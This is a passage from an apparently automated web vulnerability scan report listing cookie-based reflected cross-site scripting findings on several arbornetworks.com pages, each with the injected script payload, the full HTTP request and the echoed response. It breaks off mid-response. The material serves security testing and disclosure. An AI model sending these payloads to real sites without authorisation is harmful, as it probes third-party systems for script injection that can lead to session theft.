...[SNIP]...
<meta lang="en64ac0\"><script>alert(1)</script>6ebae96397e">
...[SNIP]...

3.156. http://www.arbornetworks.com/en/technology-partners-4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/technology-partners-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53001"><script>alert(1)</script>055958a227a was submitted in the mbfcookie[lang] cookie. This input was echoed as 53001\"><script>alert(1)</script>055958a227a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/technology-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en53001"><script>alert(1)</script>055958a227a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c300a37ef4119988756fe3892abfa309; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:19 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:19 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:20 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en53001\"><script>alert(1)</script>055958a227a">
...[SNIP]...

3.157. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/what-we-do-network-security-solutions-services.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710ca"><script>alert(1)</script>808460338d8 was submitted in the mbfcookie[lang] cookie. This input was echoed as 710ca\"><script>alert(1)</script>808460338d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en710ca"><script>alert(1)</script>808460338d8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=b8b1c40b2e2b789de45e534d4f492b77; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en710ca\"><script>alert(1)</script>808460338d8">
...[SNIP]...

3.158. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/white-papers-global-network-security-topics-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28af"><script>alert(1)</script>be53bf7bfc was submitted in the mbfcookie[lang] cookie. This input was echoed as f28af\"><script>alert(1)</script>be53bf7bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf28af"><script>alert(1)</script>be53bf7bfc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=31b8094758816ee9cc2d818e8530d4be; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:53 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:53 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:54 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:53:58 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enf28af\"><script>alert(1)</script>be53bf7bfc">
...[SNIP]...

3.159. http://www.arbornetworks.com/es/5.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/5.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7374"><script>alert(1)</script>b64724bdb0 was submitted in the mbfcookie[lang] cookie. This input was echoed as e7374\"><script>alert(1)</script>b64724bdb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /es/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene7374"><script>alert(1)</script>b64724bdb0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fb818fa49d537cc5fce3a94363e01092; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Thu, 03-Feb-2011 23:57:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:45 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ene7374\"><script>alert(1)</script>b64724bdb0">
...[SNIP]...

3.160. http://www.arbornetworks.com/es/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33d8"><script>alert(1)</script>9427a0c6b34 was submitted in the mbfcookie[lang] cookie. This input was echoed as e33d8\"><script>alert(1)</script>9427a0c6b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /es/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene33d8"><script>alert(1)</script>9427a0c6b34; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9c3ed27b413e57a1b3a097d69fb69da0; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:47 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:47 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Fri, 04-Feb-2011 00:04:48 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:04:50 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene33d8\"><script>alert(1)</script>9427a0c6b34">
...[SNIP]...

3.161. http://www.arbornetworks.com/fr/4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7922b"><script>alert(1)</script>692436b615a was submitted in the mbfcookie[lang] cookie. This input was echoed as 7922b\"><script>alert(1)</script>692436b615a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fr/4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en7922b"><script>alert(1)</script>692436b615a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e816be6b7e10a7833fede5081bc89561; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:50 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:50 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Thu, 03-Feb-2011 23:57:51 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:52 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en7922b\"><script>alert(1)</script>692436b615a">
...[SNIP]...

3.162. http://www.arbornetworks.com/fr/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48fef"><script>alert(1)</script>d8a50681f6d was submitted in the mbfcookie[lang] cookie. This input was echoed as 48fef\"><script>alert(1)</script>d8a50681f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fr/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en48fef"><script>alert(1)</script>d8a50681f6d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=27d583331c6a7879eddd591a037c3b05; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Fri, 04-Feb-2011 00:05:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:15 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en48fef\"><script>alert(1)</script>d8a50681f6d">
...[SNIP]...

3.163. http://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c78"><script>alert(1)</script>04e4fe7d485 was submitted in the mbfcookie[lang] cookie. This input was echoed as 51c78\"><script>alert(1)</script>04e4fe7d485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en51c78"><script>alert(1)</script>04e4fe7d485; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c5fd5a1d7428bc9ca259b0b09b906436; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:06 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:06 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:07 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en51c78\"><script>alert(1)</script>04e4fe7d485">
...[SNIP]...

3.164. http://www.arbornetworks.com/it [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6b5"><script>alert(1)</script>22edd466f97 was submitted in the mbfcookie[lang] cookie. This input was echoed as bd6b5\"><script>alert(1)</script>22edd466f97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /it HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbd6b5"><script>alert(1)</script>22edd466f97; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=545e64e48d805f5d6be6e0e99fa8ebd9; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:42 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:42 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Fri, 04-Feb-2011 00:02:43 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="enbd6b5\"><script>alert(1)</script>22edd466f97">
...[SNIP]...

3.165. http://www.arbornetworks.com/it/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b884f"><script>alert(1)</script>27d3dcaf1dc was submitted in the mbfcookie[lang] cookie. This input was echoed as b884f\"><script>alert(1)</script>27d3dcaf1dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /it/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enb884f"><script>alert(1)</script>27d3dcaf1dc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a508c52cccdb7282c97e2f4a70359724; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Fri, 04-Feb-2011 00:05:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:43 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="enb884f\"><script>alert(1)</script>27d3dcaf1dc">
...[SNIP]...

3.166. http://www.arbornetworks.com/jp/2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8184b"><script>alert(1)</script>1699682b65d was submitted in the mbfcookie[lang] cookie. This input was echoed as 8184b\"><script>alert(1)</script>1699682b65d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jp/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8184b"><script>alert(1)</script>1699682b65d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ca9b70e153f8141430a46d74e981ee8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:36 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:36 GMT; path=/
